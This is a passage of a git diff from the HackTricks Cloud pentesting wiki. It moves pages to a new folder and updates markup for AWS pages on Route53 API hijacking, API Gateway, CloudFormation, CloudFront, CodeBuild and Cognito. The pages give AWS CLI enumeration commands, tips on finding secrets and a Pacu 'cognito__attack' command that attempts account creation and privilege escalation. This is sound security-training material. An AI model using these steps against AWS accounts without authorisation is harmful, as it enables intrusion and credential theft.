private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. + +This is possible because: + +- AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) +- Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names +- Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. + +#### Exploitation + +Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/README.md b/src/pentesting-cloud/aws-security/aws-services/README.md new file mode 100644 index 000000000..4c1f06d1a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/README.md @@ -0,0 +1,31 @@ +# AWS - Services + +{{#include ../../../banners/hacktricks-training.md}} + +## Types of services + +### Container services + +Services that fall under container services have the following characteristics: + +- The service itself runs on **separate infrastructure instances**, such as EC2. +- **AWS** is responsible for **managing the operating system and the platform**. +- A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. +- As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. +- Also, platform-level identity and access management where it exists. +- **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. + +### Abstract Services + +- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. +- The services are accessed via endpoints using AWS application programming interfaces, APIs. +- The **underlying infrastructure, operating system, and platform is managed by AWS**. +- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. +- **Data is isolated via security mechanisms**. +- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. + +## Services Enumeration + +**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md similarity index 71% rename from pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 6a7b8d82f..18b4e1ea6 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -1,19 +1,6 @@ # AWS - API Gateway Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## API Gateway @@ -25,19 +12,19 @@ API Gateway enables you to define **how requests to your APIs should be handled* ### API Gateways Types -* **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. -* **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. -* **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. -* **REST API Private**: Create a REST API that is only accessible from within a VPC. +- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. +- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. +- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. +- **REST API Private**: Create a REST API that is only accessible from within a VPC. ### API Gateway Main Components 1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. 2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. - * The stage is indicated at the beggining of the URL of the API Gateway endpoint. + - The stage is indicated at the beggining of the URL of the API Gateway endpoint. 3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. 4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. - * In order to make effect the API needs to be **deployed again after** the resource policy is modified. + - In order to make effect the API needs to be **deployed again after** the resource policy is modified. ### Logging @@ -45,12 +32,12 @@ By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and ### Enumeration -{% hint style="success" %} -Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** -{% endhint %} +> [!TIP] +> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** + +{{#tabs }} +{{#tab name="apigateway" }} -{% tabs %} -{% tab title="apigateway" %} ```bash # Generic info aws apigateway get-account @@ -91,9 +78,11 @@ aws apigateway get-usage-plan-key --usage-plan-id --key-id ###Already consumed aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 ``` -{% endtab %} -{% tab title="apigatewayv2" %} +{{#endtab }} + +{{#tab name="apigatewayv2" }} + ```bash # Generic info aws apigatewayv2 get-domain-names @@ -135,8 +124,9 @@ aws apigatewayv2 get-models --api-id ## Call API https://.execute-api..amazonaws.com// ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Different Authorizations to access API Gateway endpoints @@ -145,7 +135,7 @@ https://.execute-api..amazonaws.com// It's possible to use resource policies to define who could call the API endpoints.\ In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. -
+
### IAM Authorizer @@ -163,7 +153,7 @@ $ curl -X https://.execute-api..amazonaws.com//< Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. -
+
Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. @@ -263,9 +253,8 @@ Call it with something like: 
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
-{% hint style="warning" %} -Depending on the Lambda code, this authorization might be vulnerable -{% endhint %} +> [!WARNING] +> Depending on the Lambda code, this authorization might be vulnerable Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` @@ -275,49 +264,36 @@ This way you could **identify this authorization** being in place. It's possible to set API endpoints that **require a valid API key** to contact it. -
+
It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: -
+
## Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md" %} -[aws-api-gateway-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md +{{#endref}} ## Privesc -{% content-ref url="../aws-privilege-escalation/aws-apigateway-privesc.md" %} -[aws-apigateway-privesc.md](../aws-privilege-escalation/aws-apigateway-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-apigateway-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-api-gateway-post-exploitation.md" %} -[aws-api-gateway-post-exploitation.md](../aws-post-exploitation/aws-api-gateway-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-api-gateway-post-exploitation.md +{{#endref}} ## Persistence -{% content-ref url="../aws-persistence/aws-api-gateway-persistence.md" %} -[aws-api-gateway-persistence.md](../aws-persistence/aws-api-gateway-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-api-gateway-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md similarity index 51% rename from pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md rename to src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index 52437363f..679781fe8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -1,19 +1,6 @@ # AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -71,17 +58,4 @@ TODO TODO -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md new file mode 100644 index 000000000..75fd48594 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -0,0 +1,75 @@ +# AWS - CloudFormation & Codestar Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## CloudFormation + +AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. + +### Enumeration + +```bash +# Stacks +aws cloudformation list-stacks +aws cloudformation describe-stacks # You could find sensitive information here +aws cloudformation list-stack-resources --stack-name +aws cloudformation get-template --stack-name cloudformationStack +aws cloudformation describe-stack-events --stack-name cloudformationStack + +## Show params and outputs +aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" + +# Export +aws cloudformation list-exports +aws cloudformation list-imports --export-name + +# Stack Sets +aws cloudformation list-stack-sets +aws cloudformation describe-stack-set --stack-set-name +aws cloudformation list-stack-instances --stack-set-name +aws cloudformation list-stack-set-operations --stack-set-name +aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id +``` + +### Privesc + +In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-cloudformation-privesc/ +{{#endref}} + +### Post-Exploitation + +Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation + +## Codestar + +AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). + +### Enumeration + +```bash +# Get projects information +aws codestar list-projects +aws codestar describe-project --id +aws codestar list-resources --project-id +aws codestar list-team-members --project-id + + aws codestar list-user-profiles + aws codestar describe-user-profile --user-arn +``` + +### Privesc + +In the following page you can check how to **abuse codestar permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-codestar-privesc/ +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md new file mode 100644 index 000000000..4a42986f4 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md @@ -0,0 +1,44 @@ +# AWS - CloudFront Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## CloudFront + +CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. + +The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. + +**By default cookie logging is disabled** but you can enable it. + +### Functions + +You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). + +As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. + +### Enumeration + +```bash +aws cloudfront list-distributions +aws cloudfront get-distribution --id # Just get 1 +aws cloudfront get-distribution-config --id + +aws cloudfront list-functions +aws cloudfront get-function --name TestFunction function_code.js + +aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" +``` + +## Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +{{#endref}} + +## Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-cloudfront-post-exploitation.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md similarity index 78% rename from pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md index 91f30bd3e..9699f755d 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md @@ -1,19 +1,6 @@ # AWS - CloudHSM Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## HSM - Hardware Security Module @@ -77,17 +64,4 @@ Overall, the high level of security provided by HSMs makes it **very difficult t TODO ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md new file mode 100644 index 000000000..ea2e36e55 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md @@ -0,0 +1,76 @@ +# AWS - Codebuild Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## CodeBuild + +AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass: + +1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance. +2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process. +3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment. + +AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability. + +### **Github/Gitlab/Bitbucket Credentials** + +#### **Default source credentials** + +This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials. + +The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs. + +#### Custom source credential + +Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**. + +This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. + +### Enumeration + +```bash +# List external repo creds (such as github tokens) +## It doesn't return the token but just the ARN where it's located +aws codebuild list-source-credentials + +# Projects +aws codebuild list-shared-projects +aws codebuild list-projects +aws codebuild batch-get-projects --names # Check for creds in env vars + +# Builds +aws codebuild list-builds +aws codebuild list-builds-for-project --project-name +aws codebuild list-build-batches +aws codebuild list-build-batches-for-project --project-name + +# Reports +aws codebuild list-reports +aws codebuild describe-test-cases --report-arn +``` + +### Privesc + +In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-codebuild-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-codebuild-post-exploitation/ +{{#endref}} + +### Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md new file mode 100644 index 000000000..581b457be --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -0,0 +1,102 @@ +# AWS - Cognito Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Cognito + +Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. + +Central to Amazon Cognito are two primary components: + +1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. +2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. + +### **User pools** + +To learn what is a **Cognito User Pool check**: + +{{#ref}} +cognito-user-pools.md +{{#endref}} + +### **Identity pools** + +The learn what is a **Cognito Identity Pool check**: + +{{#ref}} +cognito-identity-pools.md +{{#endref}} + +## Enumeration + +```bash +# List Identity Pools +aws cognito-identity list-identity-pools --max-results 60 +aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" +aws cognito-identity list-identities --identity-pool-id --max-results 60 +aws cognito-identity get-identity-pool-roles --identity-pool-id + +# Identities Datasets +## Get dataset of identity id (inside identity pool) +aws cognito-sync list-datasets --identity-pool-id --identity-id +## Get info of the dataset +aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name +## Get dataset records +aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name + +# User Pools +## Get pools +aws cognito-idp list-user-pools --max-results 60 + +## Get users +aws cognito-idp list-users --user-pool-id + +## Get groups +aws cognito-idp list-groups --user-pool-id + +## Get users in a group +aws cognito-idp list-users-in-group --user-pool-id --group-name + +## List App IDs of a user pool +aws cognito-idp list-user-pool-clients --user-pool-id + +## List configured identity providers for a user pool +aws cognito-idp list-identity-providers --user-pool-id + +## List user import jobs +aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 + +## Get MFA config of a user pool +aws cognito-idp get-user-pool-mfa-config --user-pool-id + +## Get risk configuration +aws cognito-idp describe-risk-configuration --user-pool-id +``` + +### Identity Pools - Unauthenticated Enumeration + +Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). + +### User Pools - Unauthenticated Enumeration + +Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** + +## Privesc + +{{#ref}} +../../aws-privilege-escalation/aws-cognito-privesc.md +{{#endref}} + +## Unauthenticated Access + +{{#ref}} +../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +{{#endref}} + +## Persistence + +{{#ref}} +../../aws-persistence/aws-cognito-persistence.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md similarity index 63% rename from pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md rename to src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index 0ed8cb022..14d5f806a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -1,29 +1,16 @@ # Cognito Identity Pools -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: -* Amazon Cognito user pools -* Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple -* Providers compliant with OpenID Connect (OIDC) -* SAML (Security Assertion Markup Language) identity providers -* Developer authenticated identities +- Amazon Cognito user pools +- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple +- Providers compliant with OpenID Connect (OIDC) +- SAML (Security Assertion Markup Language) identity providers +- Developer authenticated identities ```python # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: @@ -58,7 +45,7 @@ Moreover, the service **cognito-sync** is the service that allow to **manage and ### Tools for pentesting -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. @@ -67,8 +54,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` @@ -78,7 +65,7 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. #### 